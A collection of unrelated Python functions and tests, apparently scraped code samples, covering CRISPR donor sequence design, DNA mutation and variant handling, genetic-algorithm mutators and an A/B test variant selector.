pd.DataFrame({'Gene' : guide_gene, 'guide_id' : pd.Series(guide_id), \n 'donor_id' : pd.Series(guide_id + ':' + donor_mut_type + ':offset' + str(donor_seq_offset) + ':donorID' + str(idx) + ':EditPosInGuide' + str(mut_pos_in_guide)), \n 'donor_seq': pd.Series(str(donor_seq)), \n 'donor_seq_shift' : pd.Series(int(donor_seq_offset)), \n 'donor_mut_pos_in_guide' : pd.Series(str(mut_pos_in_guide)), \n 'donor_info_str' : pd.Series(donor_info_str),\n 'set_name' : pd.Series(str(set_name)) })\n out_guide_donor_df = out_guide_donor_df.append(cur_donor_line,ignore_index=True)\n \n else:\n raise ValueError('get_donor_mut_for_guide unknown donor_mut_subtype:' + donor_mut_subtype)\n \n \n elif (donor_mut_name == 'synonymous' or donor_mut_name == 'nonsynonymous' or\n donor_mut_name == 'nonsense' or donor_mut_name == 'stop2aa' or\n donor_mut_name == '1bp'):\n \n # num of nt to add left and right (-3 for the codon)\n donor_nt_add_left = int(np.floor((donor_length + edit_pos2cut_chr_pos_diff)/2) - donor_seq_offset)\n donor_nt_add_right = int((donor_length-1) - donor_nt_add_left)\n \n org_donor_seq = self.genome_seq[self.chrom].seq[(edit_chr_pos-donor_nt_add_left):(edit_chr_pos + donor_nt_add_right + 1)]\n \n # num of nts before the cut \n if (self.is_neg_strand()):\n nt_before_cut = donor_nt_add_right\n org_donor_seq = org_donor_seq.reverse_complement()\n else:\n nt_before_cut = donor_nt_add_left\n \n # the relevant codon is where the cut is or downstream to the cut\n i_first_nt_in_codon = (nt_before_cut-edit_aa_frame)\n cut_codon_dna_seq = org_donor_seq[(i_first_nt_in_codon):(i_first_nt_in_codon+3)]\n \n # the original codon\n #print \"XXXXXXXX1\"\n #print cut_codon_dna_seq\n #print nt_before_cut\n #print guide_cut_gene_aa_frame\n #print i_first_nt_in_codon\n #print edit_chr_pos\n #print donor_nt_add_left\n #print donor_seq_offset\n #print nt_before_cut\n #print self.chrom\n #print org_donor_seq\n #print (edit_chr_pos-donor_nt_add_left)\n #print (edit_chr_pos + donor_nt_add_right + 1)\n \n \n #DEBUG print\n #print type(cut_codon_dna_seq)\n #print str(cut_codon_dna_seq)\n \n org_codon = AminoAcidCodon(cut_codon_dna_seq)\n \n # getting synonymous mutations sequences\n if (donor_mut_name == 'synonymous'):\n if org_codon.is_start_codon():\n codons = []\n num_requested_ok = False\n warnings.warn(\"can NOT do synonymous mutations in a start codon. codon: %s, edit_chr_pos: %d, nt_before_cut: %d, i_first_nt_in_codon: %d, org_donor_seq: %s\" % \n (cut_codon_dna_seq, edit_chr_pos, nt_before_cut, i_first_nt_in_codon, org_donor_seq))\n else:\n codons, num_requested_ok = org_codon.get_K_synonymous_mut_codon_seqs(num_donor_variants)\n elif (donor_mut_name == 'nonsynonymous'):\n if org_codon.is_start_codon() or org_codon.is_stop_codon():\n codons = []\n num_requested_ok = False\n warnings.warn(\"can NOT do nonsynonymous mutations in a start/stop codons. codon: %s, edit_chr_pos: %d, nt_before_cut: %d, i_first_nt_in_codon: %d, org_donor_seq: %s\" % \n (cut_codon_dna_seq, edit_chr_pos, nt_before_cut, i_first_nt_in_codon, org_donor_seq))\n else:\n codons, num_requested_ok = org_codon.get_K_nonsynonymous_mut_codon_seqs(num_donor_variants)\n elif (donor_mut_name == 'nonsense'):\n if org_codon.is_stop_codon(): # this should happen only if early stop codon exist\n codons = []\n num_requested_ok = False\n warnings.warn(\"can NOT do nonesense mutations in a stop codon. codon: %s, edit_chr_pos: %d, nt_before_cut: %d, i_first_nt_in_codon: %d, org_donor_seq: %s\" % \n (cut_codon_dna_seq, edit_chr_pos, nt_before_cut, i_first_nt_in_codon, org_donor_seq))\n else:\n codons, num_requested_ok = org_codon.get_K_nonsense_mut_codon_seqs(num_donor_variants)\n elif (donor_mut_name == 'stop2aa'):\n if not org_codon.is_stop_codon():\n codons = []\n num_requested_ok = False\n warnings.warn(\"can NOT do stop2aa mutations not in a stop codon. codon: %s, edit_chr_pos: %d, nt_before_cut: %d, i_first_nt_in_codon: %d, org_donor_seq: %s\" % \n (cut_codon_dna_seq, edit_chr_pos, nt_before_cut, i_first_nt_in_codon, org_donor_seq))\n else:\n codons, num_requested_ok = org_codon.get_K_stop2aa_mut_codon_seqs(num_donor_variants)\n elif (donor_mut_name == '1bp'):\n \n # donor_mut_infoStr, donor_mut_subtype\n # nonsense_requiresOptionalSynonymous\n # 1bp_synonymous_requiresOptionalNonesense\n \n # this should happen only if early stop codon exist\n if ( ( (donor_mut_subtype == 'nonsense' and donor_mut_infoStr == \"requiresOptionalSynonymous\") or\n (donor_mut_subtype == 'synonymous' and donor_mut_infoStr == \"requiresOptionalNonesense\") or\n (donor_mut_subtype == 'nonsynonymous' and donor_mut_infoStr == \"requiresOptionalNonesenseAndSynonymous\") ) and #requires that the codon can be mutated in the position to syn/nonsense\n (not org_codon.is_mutable_2_synonymous_and_nonsese(edit_aa_frame) ) ):\n codons = []\n num_requested_ok = False\n warnings.warn(\"can NOT do both synonymous and nonesense mutations in this codon. codon: %s, edit_chr_pos: %d, nt_before_cut: %d, i_first_nt_in_codon: %d, org_donor_seq: %s\" % \n (cut_codon_dna_seq, edit_chr_pos, nt_before_cut, i_first_nt_in_codon, org_donor_seq))\n else:\n \n if (donor_mut_subtype == 'synonymous'):\n codons, num_requested_ok = org_codon.get_K_synonymous_mut_codon_seqs(num_donor_variants, edit_nt_i = edit_aa_frame)\n elif (donor_mut_subtype == 'nonsynonymous'):\n codons, num_requested_ok = org_codon.get_K_nonsynonymous_mut_codon_seqs(num_donor_variants, edit_nt_i = edit_aa_frame)\n elif (donor_mut_subtype == 'nonsense'):\n codons, num_requested_ok = org_codon.get_K_nonsense_mut_codon_seqs(num_donor_variants, edit_nt_i = edit_aa_frame)\n else:\n raise ValueError(\"get_donor_mut_for_guide - unknown mutation name:\" + donor_mut_name)\n \n \n else:\n raise ValueError(\"get_donor_mut_for_guide - unknown 1bp mutation subtype name:\" + donor_mut_subtype)\n \n if not num_requested_ok:\n warnings.warn(\"can not create that num_donor_variants: \" + str(num_donor_variants) + \" \" + donor_mut_name + \" mutations for codon:\" + str(cut_codon_dna_seq))\n \n \n for idx,alt_codon in enumerate(codons):\n alt_donor_seq = org_donor_seq[0:i_first_nt_in_codon] + \\\n alt_codon + \\\n org_donor_seq[(i_first_nt_in_codon+3):len(org_donor_seq)]\n \n\n # convert to match the guide orientation\n if ( (not guide_is_negative_strand and self.is_neg_strand()) or (guide_is_negative_strand and not self.is_neg_strand()) ):\n alt_donor_seq = alt_donor_seq.reverse_complement()\n \n if do_revcomp_donor:\n alt_donor_seq = alt_donor_seq.reverse_complement()\n \n donor_info_str = donor_mut_name + \":\" + \\\n str(cut_codon_dna_seq) + \">\" + str(alt_codon) + \":\" + \\\n org_codon.get_aa_seq() + \">\" + org_codon.get_codon_aa_seq(alt_codon)\n \n if scramble_guide_and_donor:\n donor_info_str = donor_info_str + \":\" + \"scramble\"\n tmp_donor_seq_lst = list(str(alt_donor_seq))\n random.shuffle(tmp_donor_seq_lst)\n alt_donor_seq = Seq(''.join(tmp_donor_seq_lst),alphabet=generic_dna)\n\n # appending to donor sequences matrix\n cur_donor_line = pd.DataFrame({'Gene' : guide_gene, 'guide_id' : pd.Series(guide_id), \n 'donor_id' : pd.Series(guide_id + ':' + donor_mut_type + ':offset' + str(donor_seq_offset) + ':donorID' + str(idx) + ':EditPosInGuide' + str(mut_pos_in_guide)), \n 'donor_seq': pd.Series(str(alt_donor_seq)), \n 'donor_seq_shift' : pd.Series(int(donor_seq_offset)), \n 'donor_mut_pos_in_guide' : pd.Series(str(mut_pos_in_guide)), \n 'donor_info_str' : pd.Series(donor_info_str),\n 'set_name' : pd.Series(str(set_name)) })\n \n \n out_guide_donor_df = out_guide_donor_df.append(cur_donor_line,ignore_index=True)\n\n else:\n raise ValueError('get_donor_mut_for_guide unknown donor_mut_type:' + donor_mut_type + \" and donor_mut_name:\" + donor_mut_name)\n \n\n return(out_guide_donor_df.reset_index(drop=True))", "def generate_mutation(base):\n\tif base in ['A', 'C', 'G', 'T']:\n\t\tbases = ['A', 'C', 'G', 'T']\n\t\tbases.remove(base)\n\t\treturn np.random.choice(bases)\n\telse:\n\t\traise Exception('base is not a proper DNA nucleotide (ACGT).')", "def __call__(self, mut_dat, output, variant, item, translocations, fusions, all_except):\n if variant and item:\n mut_dat = self._get_variant(mut_dat, variant, item, all_except=all_except) #get specific variant\n else:\n try:\n mut_dat = self._get_variant(mut_dat, \"Variant_Classification\", \"Silent\", all_except=True)\n except AssertionError:\n pass\n\n cases = {\"gene\": self._single_entity_mutated, #dict of functions to used based on version of handler being used\n \"line\": self._single_entity_mutated,\n \"canc\": self._multiple_entity_mutated,\n \"org\": self._multiple_entity_mutated}\n\n return cases[self.version](mut_dat, output, variant, item, translocations, fusions, all_except) #get mutations", "async def test_coding_dna_silent_mutation(test_handler,\n coding_dna_silent_mutation,\n braf_gene_context):\n resp = await test_handler.normalize(\"NM_004333.4:c.1799= \")\n assertion_checks(resp.variation_descriptor, coding_dna_silent_mutation,\n \"NM_004333.4:c.1799=\")\n\n fixture_id = \"normalize.variation:NM_004333.4%3Ac.1799%3D\"\n\n resp = await test_handler.normalize(\"ENST00000288602.11:c.1799=\")\n assert resp.variation_descriptor.id == \\\n \"normalize.variation:ENST00000288602.11%3Ac.1799%3D\"\n resp.variation_descriptor.id = fixture_id\n assertion_checks(resp.variation_descriptor, coding_dna_silent_mutation,\n \"ENST00000288602.11:c.1799=\")\n\n # TODO: What to do for older Ensembl transcripts that aren\"t found\n # in seqrepo or UTA\n # resp = await test_handler.normalize(\"ENST00000288602.6:c.1799=\")\n # assert_coding_dna_genomic_silent_mutation(resp, braf_gene_context,\n # 1798, 1799)\n # assert resp.variation_descriptor.id == \"normalize.variation:ENST00000288602.6%3Ac.1799%3D\" # noqa: E501\n # assert resp.variation_descriptor.label == \"ENST00000288602.6:c.1799=\"\n # assert resp.variation_descriptor.molecule_context == \"transcript\"\n\n resp = await test_handler.normalize(\"BRAF c.1799=\")\n assert resp.variation_descriptor.id == \"normalize.variation:BRAF%20c.1799%3D\"\n resp.variation_descriptor.id = fixture_id\n assertion_checks(resp.variation_descriptor, coding_dna_silent_mutation,\n \"BRAF c.1799=\")\n\n resp = await test_handler.normalize(\" BRAF V600E c.1799= \")\n assert resp.variation_descriptor.id == \\\n \"normalize.variation:BRAF%20V600E%20c.1799%3D\"\n resp.variation_descriptor.id = fixture_id\n assertion_checks(resp.variation_descriptor, coding_dna_silent_mutation,\n \"BRAF V600E c.1799=\")", "def match_variants(self,state,variants):\r\n for v in variants:\r\n terms = self.match_variant(state,v)\r\n if terms is not None:\r\n return terms\r\n return None", "def __getitem__(self, index):\n return self.seq[index]", "def delta_prob_raw(variants, tx, clf1, clf2, model='cterm', is_sum=True):\n # fetch c-terminal sequence\n term_seq = [] ; vars_considered = []\n for v in variants:\n if v.mutant_protein_sequence:\n if model=='cterm' and type(v) in utils.indels+utils.nmd_sub_vars:\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n elif type(v) in utils.base_substitutions:\n if model=='cterm' and v.aa_mutation_start_offset>(len(v.transcript.protein_sequence) - 23):\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n elif model=='nterm' and v.aa_mutation_start_offset<=24:\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n\n # return None if no variants\n if not term_seq:\n if is_sum: return 0\n else: return [], [], []\n # return None if U in protein sequence\n if 'U' in utils.fetch_seq(tx.protein_sequence, model=model):\n if is_sum: return 0\n else: return [], [], []\n\n # construct dataframe\n result_df = pd.DataFrame({'seq': term_seq})\n\n # create feature matrix\n X = compute_feature_matrix(result_df['seq'], 6, dinuc=True, model=model)\n X2 = compute_feature_matrix(result_df['seq'], 0, dinuc=False, model=model)\n\n # predict scores\n result_df['prob'] = clf1.predict_proba(X)[:, 0]\n\n # adjust for baseline score\n wt_seq = utils.fetch_seq(tx.protein_sequence, model=model)\n wt_df = pd.DataFrame({'seq': [wt_seq]})\n # create feature matrix\n X = compute_feature_matrix(wt_df['seq'], 6, dinuc=True, model=model)\n wt_df['prob'] = clf1.predict_proba(X)[:, 0]\n baseline = wt_df['prob'].iloc[0]\n\n # add up scores\n tmp = result_df['prob'] - baseline\n if is_sum:\n prob_sum = tmp.sum()\n return prob_sum\n else:\n return vars_considered, tmp, result_df['prob']", "def __call__(self, mutant, rng):\n raise NotImplementedError", "def find_variants(self, variants, gene, family):\n \n # get the inheritance for the gene (monoalleleic, biallelic, hemizygous\n # etc), but allow for times when we haven't specified a list of genes\n # to use\n known_gene = None\n gene_inh = None\n if self.known_genes is not None and gene in self.known_genes:\n known_gene = self.known_genes[gene]\n gene_inh = known_gene['inh']\n \n chrom_inheritance = variants[0].get_inheritance_type()\n \n # If we are looking for variants in a set of known genes, and the gene\n # isn't part of that set, then we don't ant to examine the variant for\n # that gene, UNLESS the variant is a CNV, since CNVs can be included\n # purely from size thresholds, regardless of which gene they overlap.\n if self.known_genes is not None and gene not in self.known_genes:\n variants = [ x for x in variants if x.is_cnv() ]\n \n # ignore intergenic variants\n if gene is None:\n for var in variants:\n if var.get_chrom() == self.debug_chrom and var.get_position() == self.debug_pos:\n print(var, \"lacks HGNC/gene symbol\")\n return []\n \n # Now that we are examining a single gene, check that the consequences\n # for the gene are in the required functional categories.\n variants = [ var for var in variants if var.child.is_lof(gene) or var.child.is_missense(var.child.is_cnv(), gene) ]\n if variants == []:\n return []\n \n for x in variants[0].child.info.symbols:\n try:\n symbol = x.get(gene, ['HGNC', 'SYMBOL', 'ENSG'])\n break\n except KeyError:\n continue\n logging.info(\"{}\\t{}\\tvariants: {}\\trequired_mode: {}\".format(\n family.child.get_id(), symbol, [str(x) for x in variants], gene_inh))\n \n if chrom_inheritance == \"autosomal\":\n finder = Autosomal(variants, family, known_gene, gene, self.cnv_regions)\n elif chrom_inheritance in [\"XChrMale\", \"XChrFemale\", \"YChrMale\"]:\n finder = Allosomal(variants, family, known_gene, gene, self.cnv_regions)\n \n return finder.get_candidate_variants()", "def mutation_count(variant):\n _validate_str(variant)\n if variant == WILD_TYPE_VARIANT:\n return 0\n elif variant == SYNONYMOUS_VARIANT:\n return 0\n else:\n result = [x.strip() for x in variant.split(\",\")]\n if len(set(result)) != len(result):\n raise ValueError(\"Duplicate mutant substrings found in variant\")\n return len(result)", "def get_external_variants(path, subsets):\n \n subsets = subsets.split(\",\")\n \n functional = [\"missense_variant\", \"frameshift_variant\", \"stop_gained\",\n \"splice_donor_variant\", \"splice_acceptor_variant\", \"inframe_deletion\",\n \"inframe_insertion\", \"start_lost\", \"stop_lost\",\n \"protein_altering_variant\", \"stop_retained_variant\",\n \"coding_sequence_variant\"]\n \n variants = pandas.read_table(path, sep=\"\\t\", compression=\"gzip\")\n variants = variants[variants[\"consequence\"].isin(functional)]\n variants = variants[variants[\"study_phenotype\"].isin(subsets)]\n \n # figure out the pubmed IDs for all the variants from the doi codes\n dois = variants[\"publication_doi\"].unique()\n pubmed_ids = [ doi_to_pubmed(x) for x in dois ]\n recode = dict(zip(dois, pubmed_ids))\n variants[\"pubmed\"] = variants[\"publication_doi\"].map(recode)\n \n return variants", "def slice_genome(self, fractions=0.2, at_idx=None):\n if type(at_idx) == int:\n at_idx = [at_idx]\n if type(fractions) == int:\n fractions = [fractions]\n idxs = []\n parts = []\n if fractions == [1]:\n return [GenomePart(self, 0, len(self.data)+1)]\n elif at_idx is None:\n idxs.append(np.random.randint(0, len(self)))\n if fractions is None:\n idxs = at_idx\n else:\n for frac in fractions:\n new_idx = idxs[-1]+int(len(self)*frac)\n if new_idx > len(self):\n new_idx -= len(self)\n idxs.append(new_idx)\n parts.append(GenomePart(self, idxs[-1], idxs[0]))\n for i in range(len(idxs)-1):\n parts.append(GenomePart(self, idxs[i], idxs[i+1]))\n return parts", "def test_mutation2(self):\n genotype = '0|0|2|0|0|2|0|0 1|0|0|1|1|0|0|0 0|1|0|0|0|0|2|1--1 7'\n search_space = {'dil_conv_3x3', 'dil_conv_5x5', 'dil_conv_7x7',\n 'skip_connect', 'clinc_3x3', 'clinc_7x7', 'avg_pool_3x3', 'max_pool_3x3'}\n\n mutator = Mutations(search_space, prob_mutation=0.8,\n prob_resize=0.99, prob_swap=0.99)\n mutated_g = mutator(genotype)\n a, s, d = get_conf(mutated_g)\n mutator.update_strat_good(a)", "def variants(\n self,\n *,\n samples=None,\n isolated_as_missing=None,\n alleles=None,\n impute_missing_data=None,\n copy=None,\n left=None,\n right=None,\n ):\n interval = self._check_genomic_range(left, right)\n if impute_missing_data is not None:\n warnings.warn(\n \"The impute_missing_data parameter was deprecated in 0.3.0 and will\"\n \" be removed. Use ``isolated_as_missing=False`` instead of\"\n \"``impute_missing_data=True``.\",\n FutureWarning,\n )\n # Only use impute_missing_data if isolated_as_missing has the default value\n if isolated_as_missing is None:\n isolated_as_missing = not impute_missing_data\n if copy is None:\n copy = True\n # See comments for the Variant type for discussion on why the\n # present form was chosen.\n variant = tskit.Variant(\n self,\n samples=samples,\n isolated_as_missing=isolated_as_missing,\n alleles=alleles,\n )\n if left == 0 and right == self.sequence_length:\n start = 0\n stop = self.num_sites\n else:\n start, stop = np.searchsorted(self.sites_position, interval)\n\n if copy:\n for site_id in range(start, stop):\n variant.decode(site_id)\n yield variant.copy()\n else:\n for site_id in range(start, stop):\n variant.decode(site_id)\n yield variant", "def test_get_multiallelic_variant_by_locus(self):\n v = truth.variants[\"locus_rs9628434\"]\n # Coded allele to expected genotypes.\n expected = {\n \"T\": truth.genotypes[\"subal_2_rs9628434\"],\n \"A\": truth.genotypes[\"subal_3_rs9628434\"]\n }\n with self.reader_f() as f:\n for g in f.get_variant_genotypes(v):\n self.assertEqual(\n expected[g.coded], g\n )\n del expected[g.coded]\n\n self.assertEqual(len(expected), 0)", "def runVariantDiscovery(self, sample):\n\t\t# -------------------------------- Variant Discovery Command -----------------------------\n\t\tsomaticsniper_command = \"\"\"{program} \\\n\t\t\t-q 1 \\\n\t\t\t-Q 15 \\\n\t\t\t-s 0.01 \\\n\t\t\t-T 0.85 \\\n\t\t\t-N 2 \\\n\t\t\t-r 0.001 \\\n\t\t\t-G \\\n\t\t\t-L \\\n\t\t\t-n NORMAL \\\n\t\t\t-t TUMOR \\\n\t\t\t-F vcf \\\n\t\t\t-f {reference} {tumor} {normal} {outputfile}\"\"\".format(\n\t\t\t\tprogram = self.program,\n\t\t\t\treference = self.reference,\n\t\t\t\ttumor = sample['TumorBAM'],\n\t\t\t\tnormal = sample['NormalBAM'],\n\t\t\t\toutputfile = self.raw_variants\n\t\t\t)\n\t\tlabel = \"SomaticSniper Variant Discovery\"\n\t\toutput_result = self.runCallerCommand(somaticsniper_command, label, self.raw_variants)\n\t\treturn output_result", "def get_variant_genotypes(self, variant):\n if not self.has_index:\n raise NotImplementedError(\"Not implemented when IMPUTE2 file is \"\n \"not indexed (see genipe)\")\n\n # Find the variant in the index\n try:\n impute2_chrom = CHROM_STR_TO_INT[variant.chrom.name]\n except KeyError:\n raise ValueError(\n \"Invalid chromosome ('{}') for IMPUTE2.\".format(variant.chrom)\n )\n\n variant_info = self._impute2_index[\n (self._impute2_index.chrom == impute2_chrom) &\n (self._impute2_index.pos == variant.pos)\n ]\n\n if variant_info.shape[0] == 0:\n logging.variant_not_found(variant)\n return []\n\n elif variant_info.shape[0] == 1:\n return self._get_biallelic_variant(variant, variant_info)\n\n else:\n return self._get_multialleic_variant(variant, variant_info)", "def mutate_snp(genome, var):\n nt_options = {'A':['T','G','C'], 'T':['A','G','C'], 'G':['A','T','C'], 'C':['A','T','G']}\n n = random.randint(0,2)\n nt = nt_options.get(genome.seq[var.start])[n]\n genome.mut_seq[var.start] = nt\n\n var.ref = genome.seq[var.start]\n var.alt = nt", "def show_variant(environ, experiment, record=False, variant=None):\n swab = environ['swab.swab']\n exp = swab.experiments[experiment]\n variants = exp.weighted_variants\n swabid = _getswabid(environ)\n\n if not swab.include(environ, experiment):\n variant = variant if variant is not None else exp.control\n\n # Make sure bots don't receive randomized variants. Google's advice\n # (as of August 2017): show the version the majority of users see.\n # Failing that, show a consistent version (don't randomize)\n # https://www.youtube.com/watch?v=EaSyuH2D7Mw&start=1920\n if is_bot(environ):\n variant = variant if variant is not None else exp.control\n\n if variant is None:\n request = Request(environ)\n variant = request.query.get('swab.' + experiment)\n if variant is not None and variant in variants:\n return variant\n\n # Get a random int in the range 0 ≤ x < len(variants)\n #\n # We do this in preference to calling random.choice because\n # it guarantees a particular property of the sampling if the list of\n # variants changes.\n #\n # For example, given a list of variants ``['a', 'b']``\n # we will choose a variant according to the output of\n # `r = rng.random()` such that\n #\n # 0.0 ≤ r < 0.5 → 'a'\n # 0.5 ≤ r < 1.0 → 'b'\n #\n # if later we find that 'a' is winning and want to exploit that\n # variant, we could change the list of variants to\n # ``['a', 'a', 'a', 'b']``, and the mapping would become:\n #\n # 0.0 ≤ r < 0.75 → 'a'\n # 0.75 ≤ r < 1.0 → 'b'\n #\n # Notice that the range corresponding to variant 'a' completely\n # contains the old values - ie users who previously saw the winning\n # variant 'a' will continue to see that variant.\n r = int(get_rng(environ, exp, swabid).random() * len(variants))\n variant = variants[r]\n\n if variant not in variants:\n raise ValueError(\"Invalid variant {!r}. Choices are: {!r}\"\n .format(variant, variants))\n\n environ['swab.invoked'] = True\n\n invoked = environ.setdefault('swab.experiments_invoked', set())\n if experiment in invoked:\n return variant\n invoked.add(experiment)\n\n if not record or is_bot(environ):\n return variant\n\n path = os.path.join(swab.datadir, experiment, variant, '__all__')\n try:\n f = open(path, 'a')\n except IOError:\n makedir(os.path.dirname(path))\n f = open(path, 'a')\n\n try:\n f.write(_logline(swabid))\n finally:\n f.close()\n return variant", "def get_donor_mut_for_guides(self, guides_df, guides_ids, donor_mut_type, num_donor_variants = 1,\n mut_pos_in_guide = None, donor_length=100, donor_seq_offsets=[0],\n set_name = \"\", min_dist_cut_to_donor_edge = 30, excluded_seqs = [], do_revcomp_donor = False, scramble_guide_and_donor = False):\n out_guide_donor_df = pd.DataFrame(data=None)\n\n for donor_seq_offset in donor_seq_offsets:\n \n # TODO - this should be removed after implementing donors with offsets \n if np.isnan(donor_seq_offset):\n raise ValueError(\"None/NaN offsets not implemented for gene guides - TODO...\")\n \n for guide_id in guides_ids:\n \n #print \"guide_id %s , donor_seq_offset %d\" % (guide_id, donor_seq_offset) #DEBUG\n \n cur_guide_guide_donor_df = self.get_donor_mut_for_guide(guides_df, guide_id, donor_mut_type, num_donor_variants,\n mut_pos_in_guide, donor_length,int(donor_seq_offset), set_name,\n min_dist_cut_to_donor_edge,do_revcomp_donor, scramble_guide_and_donor)\n out_guide_donor_df = out_guide_donor_df.append(cur_guide_guide_donor_df,ignore_index=True)\n \n #print cur_guide_guide_donor_df.shape[0]\n #print out_guide_donor_df.shape[0]\n \n if out_guide_donor_df.shape[0] > 0:\n out_guide_donor_df['contain_excluded_sequences'] = out_guide_donor_df['donor_seq'].str.contains( '|'.join(excluded_seqs) )\n\n return(out_guide_donor_df.reset_index(drop=True))", "def derived_subgroup(self):\n r = self._r\n gens = [p._array_form for p in self.generators]\n set_commutators = set()\n degree = self._degree\n rng = list(range(degree))\n for i in range(r):\n for j in range(r):\n p1 = gens[i]\n p2 = gens[j]\n c = list(range(degree))\n for k in rng:\n c[p2[p1[k]]] = p1[p2[k]]\n ct = tuple(c)\n if ct not in set_commutators:\n set_commutators.add(ct)\n cms = [_af_new(p) for p in set_commutators]\n G2 = self.normal_closure(cms)\n return G2", "def get_variants_by_protein_position(self, _transcript_id, _protein_pos):\n try:\n p = self.proteins[_transcript_id]\n if _protein_pos not in self.proteinPos[_transcript_id]:\n raise ValueError(\"Peptide does not start a \"\n \"{pos} in protein with transcript ID {transcript}\".format(pos=_protein_pos,\n transcript=_protein_pos))\n var = dict()\n fs = dict()\n shift = 0\n for i in xrange(_protein_pos):\n for v in p.vars.get(i, []):\n if v.type in [VariationType.FSDEL, VariationType.FSINS]:\n shift = (v.get_shift()+shift) % 3\n if shift:\n fs.setdefault(i-_protein_pos, []).append(v)\n else:\n fs.clear()\n for j in xrange(_protein_pos, _protein_pos+len(self)):\n for v in p.vars.get(j, []):\n var.setdefault(j, []).append(v)\n fs.update(var)\n return fs\n except KeyError:\n raise ValueError(\"Peptide does not origin from protein with \"\n \"transcript ID {transcript}\".format(transcript=_transcript_id))", "def _get_dscp_mutation(self):\n return self.__dscp_mutation", "def convert_to_dna(protein_sequence, wt_protein_dict):\n variant_dna_codons = []\n for index in range(0, len(protein_sequence.seq)):\n wt_aa = str(wt_protein_dict[index + 1][0])\n codon = str(wt_protein_dict[index + 1][1])\n variant_aa = protein_sequence.seq[index]\n if variant_aa != wt_aa:\n if variant_aa is not '-':\n codon = sorted_codon_table[str(variant_aa)][0]\n variant_dna_codons.append(codon)\n variant_dna_str = \"\".join(variant_dna_codons)\n variant_dna_seq = Seq(variant_dna_str, IUPAC.unambiguous_dna)\n variant_dna_seq_obj = SeqRecord(variant_dna_seq, id=protein_sequence.id, name=protein_sequence.name,\n description=protein_sequence.description)\n return variant_dna_seq_obj", "def test_mutation(self):\n genotype = '0|0|2|0|0|2|0|0 1|0|0|1|1|0|0|0 0|1|0|0|0|0|2|1--1 7'\n search_space = {'dil_conv_3x3', 'dil_conv_5x5', 'dil_conv_7x7',\n 'skip_connect', 'clinc_3x3', 'clinc_7x7', 'avg_pool_3x3', 'max_pool_3x3'}\n\n mutator = Mutations(search_space, prob_mutation=0.8,\n prob_resize=0.99, prob_swap=0.99)\n mutated_g = mutator(genotype)\n mutated_g = mutator(mutated_g)\n mutated_g = mutator(mutated_g)\n a, s, d = get_conf(mutated_g)\n print('---->', mutated_g)\n self.assertGreaterEqual(10, d)\n self.assertTrue(s in (0, 1))\n a = torch.tensor(a)\n d = int((a.shape[0]*2)**.5)\n start = 0\n for i in range(d):\n end = int((i+1)*(i+2)/2)\n self.assertTrue(a[start:end, :].sum() > 0)\n start = end", "def _multiple_entity_mutated(self, mut_dat, output, variant, item, translocations, fusions, all_except):\n if self.version == \"canc\":\n variant = \"gene\"\n else:\n variant = \"DepMap_ID\"\n\n out_dict = {\"names\": lambda x: list(set(x[self.by[self.version]])), #functions for returning specific data types\n \"dataframe\": lambda x: x}\n\n if output == \"dict\":\n out = {k:mut_dat[self.by[self.version]].loc[v].unique() for k,v in mut_dat.groupby(variant).groups.items()}\n else:\n out = out_dict[output](mut_dat)\n\n return out", "def caterpillar_sub_sequence(frame, new, cat_length):\n sub_sequence = []\n\n for index, _ in enumerate(frame):\n current = frame.copy()\n current[index] = new\n for cell in range(cat_length):\n tail_index = index - cell\n if tail_index >= 0:\n current[tail_index] = new\n\n sub_sequence.append(current)\n\n if all([item == new for item in current[index:]]):\n return sub_sequence", "def simple_mutator(chromosome, genes, properties):\n mutated_chromosome = list(chromosome)\n for i in range(len(chromosome)):\n if random.random() < properties.mutation_probability:\n mutated_chromosome[i] = random.choice(genes)\n return mutated_chromosome", "def _mutant(self, idx, F):\r\n # Generate random indices\r\n r = torch.randint(self.pop_size, (3,))\r\n # Re-generate if it contains candidate index\r\n while r[1] == r[0] or r[2] == r[0] or r[2] == r[1] or (idx in r):\r\n r = torch.randint(0, self.pop_size, (3,))\r\n \r\n\r\n # Compute mutant\r\n mutant = self.population[r[0]] + \\\r\n self.k_val * (self.population[self.best] - self.population[r[0]]) + \\\r\n F * (self.population[r[2]] - self.population[r[1]])\r\n #mutant = mutant.to(self.device)\r\n # Crossover\r\n probs = torch.rand(mutant.shape[0],device = self.device)\r\n \r\n return torch.where(probs >= self.cross_prob,self.population[idx],mutant)", "def translate_DNA(dnaseq):\n\n gen = aa_generator_DNA(dnaseq)\n seq = ''\n aa = next(gen, None)\n while aa:\n seq += aa\n aa = next(gen, None)\n return seq", "def get_merged_variants(self, variants, key):\n # type: (List[vcfio.Variant], str) -> List[vcfio.Variant]\n raise NotImplementedError", "def get_subs(n):\n \n from itertools import product\n return [''.join(sub) for sub in product('CATGN', repeat=n)]", "def subset(S, i, sub):\n if i == len(s): # if the last element was reached\n print(sub)\n else:\n subset(S, i + 1, sub) # clone subset of super-subset\n subset(S, i + 1, [*sub, S[i]]) # new subset by adding S[i] to super-subset", "def introduce_random_mutations(vntr, m):\n\t\n\tmutation_sites = np.random.choice(range(len(vntr)), m, replace=False)\n\tm_vntr = []\n\tfor site, nucleotide in enumerate(vntr):\n\t\tif site in mutation_sites:\n\t\t\tm_vntr.append(generate_mutation(nucleotide))\n\t\telse:\n\t\t\tm_vntr.append(nucleotide)\n\treturn ''.join(m_vntr)", "def mutate(dna):\n dna_out = \"\"\n mutation_chance = 0.01\n for c in range(DNA_SIZE):\n if random.uniform(0, 1) < mutation_chance:\n dna_out += random_char()\n else:\n dna_out += dna[c]\n return dna_out", "def random_element(self, mutable=False):\n from sage.groups.perm_gps.permgroup import PermutationGroup\n\n l = self._length\n d = self._degree\n Sd = self._sym\n\n g = [Sd.random_element() for _ in range(l - 1)]\n G = PermutationGroup(g)\n while not G.degree() == d or (self._connected and\n not G.is_transitive()):\n g = [Sd.random_element() for _ in range(l - 1)]\n G = PermutationGroup(g)\n\n return self([sigma.domain() for sigma in g] + [None], mutable=mutable)", "def nonuniform_mutation(random, candidate, args):\r\n bounder = args['_ec'].bounder\r\n num_gens = args['_ec'].num_generations\r\n max_gens = args['max_generations']\r\n strength = args.setdefault('mutation_strength', 1)\r\n exponent = (1.0 - num_gens / float(max_gens)) ** strength\r\n mutant = copy.copy(candidate)\r\n for 